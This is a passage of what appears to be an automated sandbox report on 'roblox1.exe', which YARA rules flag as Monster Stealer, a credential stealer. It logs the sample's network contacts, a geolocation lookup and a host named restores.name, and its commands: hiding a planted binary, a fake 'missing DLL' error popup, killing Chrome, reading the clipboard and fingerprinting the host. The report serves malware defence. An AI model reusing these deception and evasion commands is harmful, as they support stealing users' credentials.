                                                                                                                                                                                                                                  .reloc0xad10000x900x200817e154368d240e8615462a76de66e30False0.279296875data1.7625445577197119IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                                                  Resources

                                                                                                                                                                                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                  RT_RCDATA0x4b0a00xa84f38data1.0003108978271484
                                                                                                                                                                                                                                  RT_MANIFEST0xacffd80x3f8ASCII text, with very long lines (1016), with no line terminators0.4655511811023622

                                                                                                                                                                                                                                  Imports

                                                                                                                                                                                                                                  DLLImport
                                                                                                                                                                                                                                  KERNEL32.dllCloseHandle, CopyFileW, CreateDirectoryW, CreateFileMappingW, CreateFileW, CreateProcessW, DeleteCriticalSection, DeleteFileW, EnterCriticalSection, FindResourceA, FormatMessageA, FreeLibrary, GenerateConsoleCtrlEvent, GetCommandLineW, GetCurrentProcessId, GetEnvironmentVariableW, GetExitCodeProcess, GetFileAttributesW, GetFileSize, GetLastError, GetModuleFileNameW, GetModuleHandleA, GetProcAddress, GetProcessId, GetStdHandle, GetSystemTimeAsFileTime, GetTempPathW, InitializeCriticalSection, IsDBCSLeadByteEx, LeaveCriticalSection, LoadLibraryA, LoadResource, LockResource, MapViewOfFile, MultiByteToWideChar, ReadFile, SetConsoleCtrlHandler, SetEnvironmentVariableW, SetUnhandledExceptionFilter, SizeofResource, Sleep, TerminateProcess, TlsGetValue, UnmapViewOfFile, VirtualProtect, VirtualQuery, WaitForSingleObject, WideCharToMultiByte, WriteFile
                                                                                                                                                                                                                                  msvcrt.dll__C_specific_handler, ___lc_codepage_func, ___mb_cur_max_func, __iob_func, __set_app_type, __setusermatherr, __wargv, __wgetmainargs, __winitenv, _amsg_exit, _cexit, _commode, _errno, _fmode, _initterm, _lock, _onexit, _unlock, _wcsdup, _wcsicmp, _wrename, abort, calloc, exit, fprintf, fputc, free, fwrite, localeconv, malloc, mbstowcs, memcpy, memmove, memset, puts, signal, strerror, strlen, strncmp, vfprintf, wcschr, wcscmp, wcslen, wcsncmp
                                                                                                                                                                                                                                  SHELL32.dllCommandLineToArgvW, SHFileOperationW, SHGetFolderPathW

                                                                                                                                                                                                                                  Network Behavior

                                                                                                                                                                                                                                  Network Port Distribution

                                                                                                                                                                                                                                  TCP Packets

                                                                                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                  Dec 18, 2024 15:08:33.092458963 CET4971280192.168.2.8208.95.112.1
                                                                                                                                                                                                                                  Dec 18, 2024 15:08:33.213346004 CET8049712208.95.112.1192.168.2.8
                                                                                                                                                                                                                                  Dec 18, 2024 15:08:33.213521004 CET4971280192.168.2.8208.95.112.1
                                                                                                                                                                                                                                  Dec 18, 2024 15:08:33.214473963 CET4971280192.168.2.8208.95.112.1
                                                                                                                                                                                                                                  Dec 18, 2024 15:08:33.334125996 CET8049712208.95.112.1192.168.2.8
                                                                                                                                                                                                                                  Dec 18, 2024 15:08:34.310555935 CET8049712208.95.112.1192.168.2.8
                                                                                                                                                                                                                                  Dec 18, 2024 15:08:34.311791897 CET4971280192.168.2.8208.95.112.1
                                                                                                                                                                                                                                  Dec 18, 2024 15:08:34.431794882 CET8049712208.95.112.1192.168.2.8
                                                                                                                                                                                                                                  Dec 18, 2024 15:08:34.431899071 CET4971280192.168.2.8208.95.112.1
                                                                                                                                                                                                                                  Dec 18, 2024 15:09:03.678731918 CET49722443192.168.2.8135.181.65.219
                                                                                                                                                                                                                                  Dec 18, 2024 15:09:03.678776026 CET44349722135.181.65.219192.168.2.8
                                                                                                                                                                                                                                  Dec 18, 2024 15:09:03.678895950 CET49722443192.168.2.8135.181.65.219
                                                                                                                                                                                                                                  Dec 18, 2024 15:09:03.680464983 CET49722443192.168.2.8135.181.65.219
                                                                                                                                                                                                                                  Dec 18, 2024 15:09:03.680479050 CET44349722135.181.65.219192.168.2.8
                                                                                                                                                                                                                                  Dec 18, 2024 15:09:05.117233038 CET44349722135.181.65.219192.168.2.8
                                                                                                                                                                                                                                  Dec 18, 2024 15:09:05.118222952 CET49722443192.168.2.8135.181.65.219
                                                                                                                                                                                                                                  Dec 18, 2024 15:09:05.118240118 CET44349722135.181.65.219192.168.2.8
                                                                                                                                                                                                                                  Dec 18, 2024 15:09:05.119333029 CET44349722135.181.65.219192.168.2.8
                                                                                                                                                                                                                                  Dec 18, 2024 15:09:05.119393110 CET49722443192.168.2.8135.181.65.219
                                                                                                                                                                                                                                  Dec 18, 2024 15:09:05.120485067 CET49722443192.168.2.8135.181.65.219
                                                                                                                                                                                                                                  Dec 18, 2024 15:09:05.120520115 CET44349722135.181.65.219192.168.2.8
                                                                                                                                                                                                                                  Dec 18, 2024 15:09:05.120637894 CET49722443192.168.2.8135.181.65.219
                                                                                                                                                                                                                                  Dec 18, 2024 15:09:05.120640993 CET44349722135.181.65.219192.168.2.8
                                                                                                                                                                                                                                  Dec 18, 2024 15:09:05.120718002 CET49722443192.168.2.8135.181.65.219

                                                                                                                                                                                                                                  UDP Packets

                                                                                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                  Dec 18, 2024 15:08:32.883950949 CET4937853192.168.2.81.1.1.1
                                                                                                                                                                                                                                  Dec 18, 2024 15:08:33.021668911 CET53493781.1.1.1192.168.2.8
                                                                                                                                                                                                                                  Dec 18, 2024 15:09:03.538799047 CET5015853192.168.2.81.1.1.1
                                                                                                                                                                                                                                  Dec 18, 2024 15:09:03.676676989 CET53501581.1.1.1192.168.2.8

                                                                                                                                                                                                                                  DNS Queries

                                                                                                                                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                  Dec 18, 2024 15:08:32.883950949 CET192.168.2.81.1.1.10xf38cStandard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Dec 18, 2024 15:09:03.538799047 CET192.168.2.81.1.1.10xa00cStandard query (0)restores.nameA (IP address)IN (0x0001)false

                                                                                                                                                                                                                                  DNS Answers

                                                                                                                                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                  Dec 18, 2024 15:08:33.021668911 CET1.1.1.1192.168.2.80xf38cNo error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Dec 18, 2024 15:09:03.676676989 CET1.1.1.1192.168.2.80xa00cNo error (0)restores.name135.181.65.219A (IP address)IN (0x0001)false

                                                                                                                                                                                                                                  HTTP Request Dependency Graph

                                                                                                                                                                                                                                  • ip-api.com

                                                                                                                                                                                                                                  HTTP Packets

                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  0192.168.2.849712208.95.112.1803428C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  Dec 18, 2024 15:08:33.214473963 CET125OUTGET /json HTTP/1.1
                                                                                                                                                                                                                                  Host: ip-api.com
                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                  User-Agent: Python/3.10 aiohttp/3.10.5
                                                                                                                                                                                                                                  Dec 18, 2024 15:08:34.310555935 CET483INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Date: Wed, 18 Dec 2024 14:08:34 GMT
                                                                                                                                                                                                                                  Content-Type: application/json; charset=utf-8
                                                                                                                                                                                                                                  Content-Length: 306
                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                  X-Ttl: 60
                                                                                                                                                                                                                                  X-Rl: 44
                                                                                                                                                                                                                                  Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 55 53 22 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 59 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 7a 69 70 22 3a 22 31 30 31 32 33 22 2c 22 6c 61 74 22 3a 34 30 2e 37 31 32 38 2c 22 6c 6f 6e 22 3a 2d 37 34 2e 30 30 36 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 69 73 70 22 3a 22 4c 65 76 65 6c 20 33 22 2c 22 6f 72 67 22 3a 22 43 65 6e 74 75 72 79 4c 69 6e 6b 20 43 6f 6d 6d 75 6e 69 63 61 74 69 6f 6e 73 2c 20 4c 4c 43 22 2c 22 61 73 22 3a 22 41 53 33 33 35 36 20 4c 65 76 65 6c 20 33 20 50 61 72 65 6e 74 2c 20 4c 4c 43 22 2c 22 71 75 65 72 79 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 7d
                                                                                                                                                                                                                                  Data Ascii: {"status":"success","country":"United States","countryCode":"US","region":"NY","regionName":"New York","city":"New York","zip":"10123","lat":40.7128,"lon":-74.006,"timezone":"America/New_York","isp":"Level 3","org":"CenturyLink Communications, LLC","as":"AS3356 Level 3 Parent, LLC","query":"8.46.123.189"}


                                                                                                                                                                                                                                  Statistics

                                                                                                                                                                                                                                  CPU Usage

                                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                                  Memory Usage

                                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                                  High Level Behavior Distribution

                                                                                                                                                                                                                                  Click to dive into process behavior distribution

                                                                                                                                                                                                                                  Behavior

                                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                                  System Behavior

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:0
                                                                                                                                                                                                                                  Start time:09:08:21
                                                                                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                                                                                  Path:C:\Users\user\Desktop\roblox1.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:"C:\Users\user\Desktop\roblox1.exe"
                                                                                                                                                                                                                                  Imagebase:0x7ff7ac5f0000
                                                                                                                                                                                                                                  File size:11'168'256 bytes
                                                                                                                                                                                                                                  MD5 hash:CD463D16CF57C3A9F5C9588A878A7213
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                                  • Rule: JoeSecurity_GenericPythonStealer, Description: Yara detected Generic Python Stealer, Source: 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: JoeSecurity_MonsterStealer, Description: Yara detected Monster Stealer, Source: 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:2
                                                                                                                                                                                                                                  Start time:09:08:22
                                                                                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                  Imagebase:0x7ff6ee680000
                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:3
                                                                                                                                                                                                                                  Start time:09:08:25
                                                                                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Users\user\Desktop\roblox1.exe
                                                                                                                                                                                                                                  Imagebase:0x7ff7cfbb0000
                                                                                                                                                                                                                                  File size:16'927'744 bytes
                                                                                                                                                                                                                                  MD5 hash:6FE46FD6E5B143F5114E6616C59B703C
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.1943280066.00000213BDF10000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: JoeSecurity_GenericPythonStealer, Description: Yara detected Generic Python Stealer, Source: 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: JoeSecurity_MonsterStealer, Description: Yara detected Monster Stealer, Source: 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: JoeSecurity_GenericPythonStealer, Description: Yara detected Generic Python Stealer, Source: 00000003.00000002.1951447889.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: JoeSecurity_MonsterStealer, Description: Yara detected Monster Stealer, Source: 00000003.00000002.1951447889.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.1951447889.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: JoeSecurity_GenericPythonStealer, Description: Yara detected Generic Python Stealer, Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: JoeSecurity_MonsterStealer, Description: Yara detected Monster Stealer, Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe, Author: Joe Security
                                                                                                                                                                                                                                  Antivirus matches:
                                                                                                                                                                                                                                  • Detection: 71%, ReversingLabs
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:4
                                                                                                                                                                                                                                  Start time:09:08:26
                                                                                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "ver"
                                                                                                                                                                                                                                  Imagebase:0x7ff7ef160000
                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:5
                                                                                                                                                                                                                                  Start time:09:08:27
                                                                                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                                                                                                                                                                                  Imagebase:0x7ff7ef160000
                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:6
                                                                                                                                                                                                                                  Start time:09:08:27
                                                                                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "tasklist"
                                                                                                                                                                                                                                  Imagebase:0x7ff7ef160000
                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:7
                                                                                                                                                                                                                                  Start time:09:08:27
                                                                                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:wmic csproduct get uuid
                                                                                                                                                                                                                                  Imagebase:0x7ff6850e0000
                                                                                                                                                                                                                                  File size:576'000 bytes
                                                                                                                                                                                                                                  MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:8
                                                                                                                                                                                                                                  Start time:09:08:27
                                                                                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:tasklist
                                                                                                                                                                                                                                  Imagebase:0x7ff759970000
                                                                                                                                                                                                                                  File size:106'496 bytes
                                                                                                                                                                                                                                  MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Reputation:moderate
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:9
                                                                                                                                                                                                                                  Start time:09:08:30
                                                                                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\user\AppData\Local\MonsterUpdateService\Monster.exe""
                                                                                                                                                                                                                                  Imagebase:0x7ff7ef160000
                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:10
                                                                                                                                                                                                                                  Start time:09:08:30
                                                                                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\attrib.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:attrib +h +s "C:\Users\user\AppData\Local\MonsterUpdateService\Monster.exe"
                                                                                                                                                                                                                                  Imagebase:0x7ff715ae0000
                                                                                                                                                                                                                                  File size:23'040 bytes
                                                                                                                                                                                                                                  MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Reputation:moderate
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:11
                                                                                                                                                                                                                                  Start time:09:08:30
                                                                                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The Program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. Try reinstalling the program to fix this problem', 0, 'System Error', 0+16);close()""
                                                                                                                                                                                                                                  Imagebase:0x7ff7ef160000
                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:12
                                                                                                                                                                                                                                  Start time:09:08:30
                                                                                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"
                                                                                                                                                                                                                                  Imagebase:0x7ff7ef160000
                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:13
                                                                                                                                                                                                                                  Start time:09:08:31
                                                                                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The Program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. Try reinstalling the program to fix this problem', 0, 'System Error', 0+16);close()"
                                                                                                                                                                                                                                  Imagebase:0x7ff6875b0000
                                                                                                                                                                                                                                  File size:14'848 bytes
                                                                                                                                                                                                                                  MD5 hash:0B4340ED812DC82CE636C00FA5C9BEF2
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:14
                                                                                                                                                                                                                                  Start time:09:08:31
                                                                                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\taskkill.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:taskkill /F /IM chrome.exe
                                                                                                                                                                                                                                  Imagebase:0x7ff6b9050000
                                                                                                                                                                                                                                  File size:101'376 bytes
                                                                                                                                                                                                                                  MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:17
                                                                                                                                                                                                                                  Start time:09:08:40
                                                                                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                                                                                                                                  Imagebase:0x7ff7ef160000
                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:18
                                                                                                                                                                                                                                  Start time:09:08:40
                                                                                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard"
                                                                                                                                                                                                                                  Imagebase:0x7ff7ef160000
                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:19
                                                                                                                                                                                                                                  Start time:09:08:40
                                                                                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "chcp"
                                                                                                                                                                                                                                  Imagebase:0x7ff7ef160000
                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:20
                                                                                                                                                                                                                                  Start time:09:08:40
                                                                                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:tasklist /FO LIST
                                                                                                                                                                                                                                  Imagebase:0x7ff759970000
                                                                                                                                                                                                                                  File size:106'496 bytes
                                                                                                                                                                                                                                  MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:21
                                                                                                                                                                                                                                  Start time:09:08:40
                                                                                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "chcp"
                                                                                                                                                                                                                                  Imagebase:0x7ff7ef160000
                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:22
                                                                                                                                                                                                                                  Start time:09:08:40
                                                                                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
